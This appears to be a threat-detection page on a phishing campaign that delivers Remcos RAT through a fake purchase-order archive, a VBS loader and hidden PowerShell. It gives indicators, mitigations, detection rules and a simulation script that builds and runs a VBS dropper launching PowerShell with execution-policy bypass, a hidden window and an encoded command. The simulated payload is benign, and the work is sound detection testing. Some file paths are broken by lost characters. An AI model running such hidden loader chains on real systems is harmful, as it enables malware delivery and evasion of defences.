Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A phishing email themed as a purchase order delivers an archive with a double extension that extracts a malicious VBS loader. That loader launches a hidden PowerShell process, which retrieves a fake PNG file containing an encoded payload. The payload is then deobfuscated, rebuilt as a .NET portable executable, and loaded directly into memory, ultimately deploying the Remcos remote access trojan. The campaign highlights a fileless execution chain built around familiar email-based attack techniques.
Investigation
The analysis followed the entire infection sequence from the original phishing email to the final Remcos RAT deployment. Investigators identified key artifacts including the VBS script name, use of PowerShell environment variables, and the URL used to download the fake PNG file. The reconstructed .NET assembly was loaded in memory, while Remcos-specific registry entries and mutex artifacts helped confirm the final payload. Researchers also captured relevant network indicators, including the command-and-control domain tied to the campaign.
Mitigation
Organizations should strengthen attachment scanning and block archive files that use misleading double extensions. PowerShell execution policies should be enforced, and use of wscript.exe should be tightly restricted where possible. Defenders should also monitor for suspicious registry keys under HKCU\SOFTWARE and track TLS JA3 fingerprints associated with Remcos activity. Email security gateways should be updated regularly to improve detection of phishing lures targeting procurement and finance workflows.
Response
If this activity is detected, isolate the affected endpoint immediately and terminate suspicious PowerShell or wscript.exe processes. Collect memory dumps and relevant registry artifacts for forensic analysis before cleanup. Remove the Remcos payload and related persistence entries, then reset any credentials that may have been exposed. A broader threat hunt should also be conducted across the environment to identify systems showing similar indicators.
"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef file fill:#e6e6e6 classDef process fill:#ffeb99 classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef config fill:#dddddd %% Node definitions action_phishing["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/>Victim receives email with malicious archive named <i>Sarens PO_SB-0407026-001_PDF.txz</i>"] class action_phishing action technique_masquerade["<b>Technique</b> – <b>T1036.007 Masquerading: Double File Extension</b><br/>Archive uses .txz extension but appears as .pdf to deceive the user"] class technique_masquerade technique action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim opens the archive, causing extraction of a VBS script"] class action_user_exec action file_vbs["<b>File</b> – <b>VBS Script</b><br/>Name: Sarens PO_SB-0407026-001_PDF.vbs"] class file_vbs file process_wscript["<b>Process</b> – <b>wscript.exe</b><br/>Executes the VBS script"] class process_wscript process process_powershell["<b>Process</b> – <b>PowerShell</b><br/>Launches with executionu2011policy bypass to download remote payload"] class process_powershell process file_payload_image["<b>File</b> – <b>Fake Image</b><br/>Name: optimized_MSI.png<br/>Contains Base64u2011encoded .NET PE payload"] class file_payload_image file technique_proc_inject_tls["<b>Technique</b> – <b>T1055.005 Process Injection: Thread Local Storage</b><br/>PowerShell injects code via TLS"] class technique_proc_inject_tls technique technique_proc_inject_apc["<b>Technique</b> – <b>T1055.004 Process Injection: Asynchronous Procedure Call</b><br/>PowerShell injects code via APC"] class technique_proc_inject_apc technique technique_proc_inject_pe["<b>Technique</b> – <b>T1055.002 Process Injection: Portable Executable Injection</b><br/>Reconstructed .NET PE loaded into memory with AppDomain.Load"] class technique_proc_inject_pe technique malware_remcos["<b>Malware</b> – <b>Remcos RAT</b><br/>Establishes encrypted TLS channel to C2 domain"] class malware_remcos malware comm_c2_web["<b>Technique</b> – <b>T1102.003 Web Service: Oneu2011Way Communication</b><br/>Encrypted TLS connection to <i>dentalux202.ydns.eu</i>"] class comm_c2_web technique registry_key["<b>Configuration</b> – <b>Registry Key</b><br/>HKCU\SOFTWARE\Rmcu2011HQO1B7 created by RAT"] class registry_key config mutex["<b>Configuration</b> – <b>Mutex</b><br/>Remcos mutex identifier Rmcu2011HQO1B7"] class mutex config %% Connections action_phishing –>|delivers| technique_masquerade technique_masquerade –>|leads to| action_user_exec action_user_exec –>|extracts| file_vbs file_vbs –>|executed by| process_wscript process_wscript –>|launches| process_powershell process_powershell –>|downloads| file_payload_image file_payload_image –>|provides| technique_proc_inject_tls file_payload_image –>|provides| technique_proc_inject_apc file_payload_image –>|provides| technique_proc_inject_pe technique_proc_inject_tls –>|enables| malware_remcos technique_proc_inject_apc –>|enables| malware_remcos technique_proc_inject_pe –>|enables| malware_remcos malware_remcos –>|communicates via| comm_c2_web malware_remcos –>|creates| registry_key malware_remcos –>|creates| mutex "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Suspicious Powershell Strings (via powershell)
View
Possible Dynamic DNS Service Was Contacted (via dns)
View
IOCs (HashSha256) to detect: From a Deceptive Purchase Order to Remcos RAT
View
IOCs (SourceIP) to detect: From a Deceptive Purchase Order to Remcos RAT
View
IOCs (DestinationIP) to detect: From a Deceptive Purchase Order to Remcos RAT
View
Remcos RAT Command-and-Control Domain and Malicious Payload URL Access [Windows Network Connection]
View
Detection of VBS Script Execution Followed by PowerShell with ExecutionPolicy Bypass [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands
The adversary sends a phishing email with an attached malicious.vbs. The user double‑clicks the file, invoking wscript.exe. The VBS script then launches PowerShell with -ExecutionPolicy Bypass to download a remote PowerShell payload that installs the Remcos RAT. The exact command line is:
powershell.exe -ExecutionPolicy Bypass -NoLogo -WindowStyle Hidden -EncodedCommand <BASE64_PAYLOAD>Regression Test Script
#--------------------------------------------------------------------
# Simulation Script: VBS → PowerShell ExecutionPolicy Bypass
#--------------------------------------------------------------------
# 1. Build a small PowerShell payload (e.g., write a marker file)
$payload = 'Set-Content -Path "$env:Temppwned.txt" -Value "Compromised"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
# 2. Create the malicious VBS file that runs the PowerShell command
$vbsContent = @"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -ExecutionPolicy Bypass -NoLogo -WindowStyle Hidden -EncodedCommand $encoded", 0, False
"@
$vbsPath = "$env:Tempmalicious.vbs"
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 3. Execute the VBS script (simulates user double‑click)
Start-Process -FilePath "wscript.exe" -ArgumentList "`"$vbsPath`"" -WindowStyle Hidden
# Optional: wait a few seconds for the payload to execute
Start-Sleep -Seconds 5
Write-Host "Simulation complete. Check $env:Temppwned.txt for artifact."
#--------------------------------------------------------------------Cleanup Commands
# Remove artifacts created during the simulation
Remove-Item -Path "$env:Tempmalicious.vbs" -ErrorAction SilentlyContinue
Remove-Item -Path "$env:Temppwned.txt" -ErrorAction SilentlyContinue
# Stop any lingering PowerShell processes started by the script (if needed)
Get-Process -Name "powershell" -ErrorAction SilentlyContinue | Stop-Process -Force